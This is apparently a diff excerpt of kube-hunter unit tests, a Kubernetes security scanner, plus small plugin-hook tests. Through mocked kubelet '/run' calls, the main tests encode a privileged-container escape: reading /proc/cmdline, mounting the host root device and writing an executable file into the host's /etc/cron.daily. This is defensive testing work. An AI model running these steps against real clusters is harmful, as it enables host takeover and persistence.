session_mock.post(run_url + "env", text=env)

class_being_tested = ProveAnonymousAuth(anonymous_auth_enabled_event)
class_being_tested.execute()

assert "The following containers have been successfully breached." in class_being_tested.event.evidence

assert counter == 1

def test_proveanonymousauth_success_with_privileged_container_via_privileged_setting():
proveanonymousauth_success(create_test_event_type_one(), '"privileged": true')

def test_proveanonymousauth_success_with_privileged_container_via_capabilities():
proveanonymousauth_success(create_test_event_type_one(), '"capabilities": { "add": ["SYS_ADMIN"] }')

def test_proveanonymousauth_connectivity_issues():
class_being_tested = ProveAnonymousAuth(create_test_event_type_one())

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://" + class_being_tested.event.host + ":10250/"
listing_pods_url = url + "pods"

session_mock.get(listing_pods_url, exc=requests.exceptions.ConnectionError)

class_being_tested.execute()

assert class_being_tested.event.evidence == ""

@handler.subscribe(ExposedExistingPrivilegedContainersViaSecureKubeletPort)
class ExposedPrivilegedContainersViaAnonymousAuthEnabledInSecureKubeletPortEventCounter:
def __init__(self, event):
global counter
counter += 1

def test_check_file_exists_existing_file():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
session_mock.post(run_url + urllib.parse.quote("ls mock.txt", safe=""), text="mock.txt")

return_value = class_being_tested.check_file_exists(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "mock.txt"
)

assert return_value is True

def test_check_file_exists_non_existent_file():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
session_mock.post(
run_url + urllib.parse.quote("ls nonexistentmock.txt", safe=""),
text="ls: nonexistentmock.txt: No such file or directory",
)

return_value = class_being_tested.check_file_exists(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
"nonexistentmock.txt",
)

assert return_value is False

rm_command_removed_successfully_callback_counter = 0

def rm_command_removed_successfully_callback(request, context):
global rm_command_removed_successfully_callback_counter

if rm_command_removed_successfully_callback_counter == 0:
rm_command_removed_successfully_callback_counter += 1
return "mock.txt"
else:
return "ls: mock.txt: No such file or directory"

def test_rm_command_removed_successfully():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
session_mock.post(
run_url + urllib.parse.quote("ls mock.txt", safe=""), text=rm_command_removed_successfully_callback
)
session_mock.post(run_url + urllib.parse.quote("rm -f mock.txt", safe=""), text="")

return_value = class_being_tested.rm_command(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
"mock.txt",
number_of_rm_attempts=1,
seconds_to_wait_for_os_command=None,
)

assert return_value is True

def test_rm_command_removed_failed():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
session_mock.post(run_url + urllib.parse.quote("ls mock.txt", safe=""), text="mock.txt")
session_mock.post(run_url + urllib.parse.quote("rm -f mock.txt", safe=""), text="Permission denied")

return_value = class_being_tested.rm_command(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
"mock.txt",
number_of_rm_attempts=1,
seconds_to_wait_for_os_command=None,
)

assert return_value is False

def test_attack_exposed_existing_privileged_container_success():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
file_name = "kube-hunter-mock" + str(uuid.uuid1())
file_name_with_path = f"{directory_created}/etc/cron.daily/{file_name}"

session_mock.post(run_url + urllib.parse.quote(f"touch {file_name_with_path}", safe=""), text="")
session_mock.post(
run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""), text=""
)

return_value = class_being_tested.attack_exposed_existing_privileged_container(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
directory_created,
number_of_rm_attempts,
None,
file_name,
)

assert return_value["result"] is True

def test_attack_exposed_existing_privileged_container_failure_when_touch():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
file_name = "kube-hunter-mock" + str(uuid.uuid1())
file_name_with_path = f"{directory_created}/etc/cron.daily/{file_name}"

url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
session_mock.post(
run_url + urllib.parse.quote(f"touch {file_name_with_path}", safe=""),
text="Operation not permitted",
)

return_value = class_being_tested.attack_exposed_existing_privileged_container(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
directory_created,
None,
file_name,
)

assert return_value["result"] is False

def test_attack_exposed_existing_privileged_container_failure_when_chmod():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
file_name = "kube-hunter-mock" + str(uuid.uuid1())
file_name_with_path = f"{directory_created}/etc/cron.daily/{file_name}"

url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
session_mock.post(run_url + urllib.parse.quote(f"touch {file_name_with_path}", safe=""), text="")
session_mock.post(
run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""),
text="Permission denied",
)

return_value = class_being_tested.attack_exposed_existing_privileged_container(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
directory_created,
None,
file_name,
)

assert return_value["result"] is False

def test_check_directory_exists_existing_directory():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="mock.txt")

return_value = class_being_tested.check_directory_exists(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "Mock"
)

assert return_value is True

def test_check_directory_exists_non_existent_directory():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="ls: Mock: No such file or directory")

return_value = class_being_tested.check_directory_exists(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "Mock"
)

assert return_value is False

rmdir_command_removed_successfully_callback_counter = 0

def rmdir_command_removed_successfully_callback(request, context):
global rmdir_command_removed_successfully_callback_counter

if rmdir_command_removed_successfully_callback_counter == 0:
rmdir_command_removed_successfully_callback_counter += 1
return "mock.txt"
else:
return "ls: Mock: No such file or directory"

def test_rmdir_command_removed_successfully():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
session_mock.post(
run_url + urllib.parse.quote("ls Mock", safe=""), text=rmdir_command_removed_successfully_callback
)
session_mock.post(run_url + urllib.parse.quote("rmdir Mock", safe=""), text="")

return_value = class_being_tested.rmdir_command(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
"Mock",
number_of_rmdir_attempts=1,
seconds_to_wait_for_os_command=None,
)

assert return_value is True

def test_rmdir_command_removed_failed():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="mock.txt")
session_mock.post(run_url + urllib.parse.quote("rmdir Mock", safe=""), text="Permission denied")

return_value = class_being_tested.rmdir_command(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
"Mock",
number_of_rmdir_attempts=1,
seconds_to_wait_for_os_command=None,
)

assert return_value is False

def test_get_root_values_success():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
root_value, root_value_type = class_being_tested.get_root_values(cat_proc_cmdline)

assert root_value == "Mock" and root_value_type == "LABEL="

def test_get_root_values_failure():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)
root_value, root_value_type = class_being_tested.get_root_values("")

assert root_value is None and root_value_type is None

def test_process_exposed_existing_privileged_container_success():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())

session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
session_mock.post(run_url + urllib.parse.quote(f"mkdir {directory_created}", safe=""), text="")
session_mock.post(
run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text=""
)
session_mock.post(
run_url + urllib.parse.quote(f"cat {directory_created}/etc/hostname", safe=""), text="mockhostname"
)

return_value = class_being_tested.process_exposed_existing_privileged_container(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
number_of_umount_attempts,
number_of_rmdir_attempts,
None,
directory_created,
)

assert return_value["result"] is True

def test_process_exposed_existing_privileged_container_failure_when_cat_cmdline():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())

session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text="Permission denied")

return_value = class_being_tested.process_exposed_existing_privileged_container(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
number_of_umount_attempts,
number_of_rmdir_attempts,
None,
directory_created,
)

assert return_value["result"] is False

def test_process_exposed_existing_privileged_container_failure_when_findfs():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())

session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="Permission denied")

return_value = class_being_tested.process_exposed_existing_privileged_container(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
number_of_umount_attempts,
number_of_rmdir_attempts,
None,
directory_created,
)

assert return_value["result"] is False

def test_process_exposed_existing_privileged_container_failure_when_mkdir():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())

session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
session_mock.post(run_url + urllib.parse.quote(f"mkdir {directory_created}", safe=""), text="Permission denied")

return_value = class_being_tested.process_exposed_existing_privileged_container(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
number_of_umount_attempts,
number_of_rmdir_attempts,
None,
directory_created,
)

assert return_value["result"] is False

def test_process_exposed_existing_privileged_container_failure_when_mount():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())

session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
session_mock.post(run_url + urllib.parse.quote(f"mkdir {directory_created}", safe=""), text="")
session_mock.post(
run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""),
text="Permission denied",
)

return_value = class_being_tested.process_exposed_existing_privileged_container(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
number_of_umount_attempts,
number_of_rmdir_attempts,
None,
directory_created,
)

assert return_value["result"] is False

def test_process_exposed_existing_privileged_container_failure_when_cat_hostname():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())

session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
session_mock.post(run_url + urllib.parse.quote(f"mkdir {directory_created}", safe=""), text="")
session_mock.post(
run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text=""
)
session_mock.post(
run_url + urllib.parse.quote(f"cat {directory_created}/etc/hostname", safe=""),
text="Permission denied",
)

return_value = class_being_tested.process_exposed_existing_privileged_container(
url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu",
number_of_umount_attempts,
number_of_rmdir_attempts,
None,
directory_created,
)

assert return_value["result"] is False

def test_maliciousintentviasecurekubeletport_success():
class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None)

with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock:
url = "https://localhost:10250/"
run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd="
directory_created = "/kube-hunter-mock_" + str(uuid.uuid1())
file_name = "kube-hunter-mock" + str(uuid.uuid1())
file_name_with_path = f"{directory_created}/etc/cron.daily/{file_name}"

session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline)
session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs")
session_mock.post(run_url + urllib.parse.quote(f"mkdir {directory_created}", safe=""), text="")
session_mock.post(
run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text=""
)
session_mock.post(
run_url + urllib.parse.quote(f"cat {directory_created}/etc/hostname", safe=""), text="mockhostname"
)
session_mock.post(run_url + urllib.parse.quote(f"touch {file_name_with_path}", safe=""), text="")
session_mock.post(
run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""), text=""
)

class_being_tested.execute(directory_created, file_name)

message = "The following exposed existing privileged containers have been successfully"
message += " abused by starting/modifying a process in the host."

assert message in class_being_tested.event.evidence
13
tests/plugins/test_hooks.py
Normal file
@@ -0,0 +1,13 @@
from kube_hunter.plugins import hookimpl

return_string = "return_string"

@hookimpl
def parser_add_arguments(parser):
return return_string

@hookimpl
def load_plugin(args):
return return_string
17
tests/plugins/test_plugins_hooks.py
Normal file
@@ -0,0 +1,17 @@
from argparse import ArgumentParser
from tests.plugins import test_hooks
from kube_hunter.plugins import initialize_plugin_manager

def test_all_plugin_hooks():
pm = initialize_plugin_manager()
pm.register(test_hooks)

# Testing parser_add_arguments
parser = ArgumentParser("Test Argument Parser")
results = pm.hook.parser_add_arguments(parser=parser)
assert test_hooks.return_string in results

# Testing load_plugin
results = pm.hook.load_plugin(args=[])
assert test_hooks.return_string in results
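These tests exercise the same flow an application entry point can use: build the plugin manager, let plugins extend the parser, parse the arguments, then hand the parsed result back to the plugins. A hedged sketch of that sequence (not a verbatim copy of kube-hunter's own startup code):

    from argparse import ArgumentParser
    from kube_hunter.plugins import initialize_plugin_manager

    pm = initialize_plugin_manager()
    parser = ArgumentParser(description="kube-hunter")
    pm.hook.parser_add_arguments(parser=parser)   # every registered plugin may add options
    args = parser.parse_args([])                  # empty argv here, for illustration only
    pm.hook.load_plugin(args=args)                # plugins react to the parsed arguments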